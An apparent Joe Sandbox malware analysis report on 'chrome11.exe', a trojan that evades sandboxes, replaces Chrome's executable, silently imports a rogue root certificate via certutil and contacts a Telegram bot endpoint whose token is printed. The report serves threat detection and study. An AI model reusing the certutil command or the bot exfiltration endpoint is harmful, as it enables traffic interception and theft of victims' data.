Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\chrome11.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\chrome11.exe	Memory allocated: 1D22EF50000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Memory allocated: 1D248820000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Window / User API: threadDelayed 4770			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Window / User API: threadDelayed 1665			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7752	Thread sleep count: 4770 > 30	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7752	Thread sleep count: 1665 > 30	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99415s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -98063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -97608s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -97485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7728	Thread sleep time: -97360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 7668	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99887	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99415	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99187	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 99078	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98969	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98859	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98750	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98531	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98422	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98313	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98188	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 98063	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 97719	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 97608	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 97485	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 97360	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: chrome11.exe, 00000000.00000002.1479408674.000001D24905D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\chrome11.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Queries volume information: C:\Users\user\Desktop\chrome11.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	3 Masquerading	OS Credential Dumping	1 Query Registry	1 Taint Shared Content	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	2 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
chrome11.exe	32%	ReversingLabs	Win64.Trojan.Ursu

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\Google\Chrome\Application\chrome.exe	32%	ReversingLabs	Win64.Trojan.Ursu
C:\Program Files\Google\Chrome\Application\original.exe (copy)	32%	ReversingLabs	Win64.Trojan.Ursu

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://html4/loose.dtd	chrome11.exe, chrome.exe.0.dr	false	high
https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/	chrome11.exe, 00000000.00000002.1477410588.000001D230837000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	chrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	chrome11.exe, chrome.exe.0.dr	false	high
http://.css	chrome11.exe, chrome.exe.0.dr	false	high
http://api.telegram.org	chrome11.exe, 00000000.00000002.1477410588.000001D2308E3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chrome11.exe, 00000000.00000002.1477410588.000001D2308BF000.00000004.00000800.00020000.00000000.sdmp	false	high
http://.jpg	chrome11.exe, chrome.exe.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577377
Start date and time:	2024-12-18 12:45:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	chrome11.exe
Detection:	MAL
Classification:	mal84.spre.bank.troj.adwa.evad.winEXE@4/14@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 67% Number of executed functions: 65 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: chrome11.exe

Simulations

Behavior and APIs

Time	Type	Description
06:46:36	API Interceptor	24x Sleep call for process: chrome11.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FileScanner.exe	Get hash	malicious	Unknown	Browse
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	stealer.jar	Get hash	malicious	Can Stealer	Browse
	stealer.jar	Get hash	malicious	Can Stealer	Browse
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FileScanner.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FileScanner.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Lu4421.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	Lu4421.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	149.154.167.220
	http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32	Get hash	malicious	Unknown	Browse	149.154.167.220
	Memo - Impairment Test 2023 MEX010B (5).js	Get hash	malicious	Unknown	Browse	149.154.167.220
	Awb 4586109146.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	PO 0309494059506060609696007.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	x0EMKX5G1g.exe	Get hash	malicious	PureCrypter, PureLog Stealer	Browse	149.154.167.220
	sldkjgsdGarDe3.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Program Files\Google\Chrome\Application\original.exe (copy)	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse
C:\Program Files\Google\Chrome\Application\chrome.exe	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\Application\chrome.exe

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4767744
Entropy (8bit):	5.902097026291253
Encrypted:	false
SSDEEP:	98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
MD5:	5B39766F490F17925DEFAEE5DE2F9861
SHA1:	9C89F2951C255117EB3EEBCD61DBECF019A4C186
SHA-256:	DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
SHA-512:	D216FA45C98E423F15C2B52F980FC1C439D365B9799E5063E6B09837B419D197BA68D52EA7FACF469EAE38E531F17BD19EAF25D170465DC41217CA6AB9EB30BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: fWAr4zGUkY.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`.................................................8.G.T.....H.......................H.......G...............................................G.............. ..H............text.....G.. ....G................. ..`.rsrc.........H.......G.............@..@.reloc........H.......H.............@..BH.........-.`.......!...d.,.t9............................................(....&..(........s.........s.........s.........s.........s..........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0..B........~.....(......9!...r...p.....(....o....s.............~.....8............0...........~.....8..........."..........Vs....(....t.............(....*.0..

C:\Program Files\Google\Chrome\Application\chrome.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Google\Chrome\Application\original.exe (copy)

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4767744
Entropy (8bit):	5.902097026291253
Encrypted:	false
SSDEEP:	98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
MD5:	5B39766F490F17925DEFAEE5DE2F9861
SHA1:	9C89F2951C255117EB3EEBCD61DBECF019A4C186
SHA-256:	DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
SHA-512:	D216FA45C98E423F15C2B52F980FC1C439D365B9799E5063E6B09837B419D197BA68D52EA7FACF469EAE38E531F17BD19EAF25D170465DC41217CA6AB9EB30BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: fWAr4zGUkY.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`.................................................8.G.T.....H.......................H.......G...............................................G.............. ..H............text.....G.. ....G................. ..`.rsrc.........H.......G.............@..@.reloc........H.......H.............@..BH.........-.`.......!...d.,.t9............................................(....&..(........s.........s.........s.........s.........s..........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0..B........~.....(......9!...r...p.....(....o....s.............~.....8............0...........~.....8..........."..........Vs....(....t.............(....*.0..

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\4c26414c92d9e5d65c1ce1a2051839ac_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	data
Category:	dropped
Size (bytes):	2285
Entropy (8bit):	7.623211339953047
Encrypted:	false
SSDEEP:	48:HetxCErYqQXUo0spKAd4V1Ht7qRT3OfWgJrM9uo99zS:HYxCvX4V1HNqRT+Pr4u
MD5:	1A9B8CED3F7E1013C46E8671920B6E5E
SHA1:	E8B100DCCEEAB3C00D17A041366196228CC3016E
SHA-256:	90E44AE75622F268DDD9E5C2BD48B6B5554EE322AEE6B2FD42A825A230F82100
SHA-512:	9BDFEF127C0F505BBC28AD348B4FC0843F0C22119AEFC5EFE3370A81DA6C414DFBD640080658A1C0B93830E317F89C732B0D40415E53BA56F23EB18E9FD3104D
Malicious:	false
Preview:	........I...............P...............Titanium Root Certificate Authority-1f839c74-64c2-4b71-8bfa-f392f9ebc026.....................RSA1.................amW...p":.@..&'.....4...d..L!.&&..\|f.......v^.....aD.F\.3......E}.7.4...`...i(S.....<a..Q..Rt28..o...!.S\|..;.r8.q.......t....}.).$..kH.........FU..V.;..".))o..^CuOA.[....F.?&..F...,v...X.4.1.([2....R.%..#.....9.K..\.s...=1.HcL...p....1/p..k.......................z..O......Z..r...D.>(..y......,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....{...".....u.'I.!^T.C..y.4enB..l............ .....u]..Y...5..lWt.j@.+..z.0...y.P.......{..R}.e!..U.....p.X..C&<...3...,...$..iI....^...O.....490["..o.Yu.._.:.&M.:$.....e+.f.wx0X...}.9y..u..f..ui?F.Dh`i...<5..+&...[....j..J..9..N...p.#R...'...s...]Jv.q<#.6.!J.n..W.....v...HJ&..5.o.6X9.x.M..Z.3_...._vO%.g..\"j....T.%. ..0l$.'.:.......B.`-...c.N..b:......y....f.E..j..I.o...XY....2E.(.......9..i.=..B.a..d$.:.U..g.Mw.G1.f(..V.'..H.G{>(b.T........T..N.cfp.

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome11.exe.log

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	5.382609664334896
Encrypted:	false
SSDEEP:	48:MxHKQrHNpOYHKGSI6o6+vxp3/elFHptHTHhAHKKkxHB1qHGIs0HKD:iqYtpOYqGSI6o9Zp/elFJtzHeqKkxhw6
MD5:	2BE09B8559C289356470B28D09A3A86D
SHA1:	7CB90D943BD4C993204AB6548039F0F48E82D263
SHA-256:	6899F7B36D91DD203BC84978E434AFDA3B560AB59662BED11BDB0480D6179517
SHA-512:	311E100C3DE17B1DC60FC933E95A28B196BB291FB5C516C5B250E12FAC673DBF34A2AB8A2CD8278AE6B0B25799A94612F0E556AE4C7EE5DDD406CE56A2523869
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.303

C:\Users\user\AppData\Local\Temp\TmpC435.tmp

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2631
Entropy (8bit):	7.841145153995131
Encrypted:	false
SSDEEP:	48:LiEUWlXUIWr9ZdiYpA1bd0nqTn3nlf6pPsdkrdFD:L9xXUh9DPA1bdE8d6UkZ
MD5:	DBB05A66426586C397035EBCE4FDFB8A
SHA1:	ABA63C97F879C7E319BC53DAE7A9714986EC35B2
SHA-256:	3AE2483C0531414BFEB1EC07D00B7CB1E6885D8ABD498FFBFA541ABB137149A5
SHA-512:	6FBF442332EA5B7389160E7E00E11D684BA2708F81C9BBE3865C6319215C6CDB0A323370832A54F65E7C0378DCF2D8C0E106D753935C827DF97194D779786766
Malicious:	false
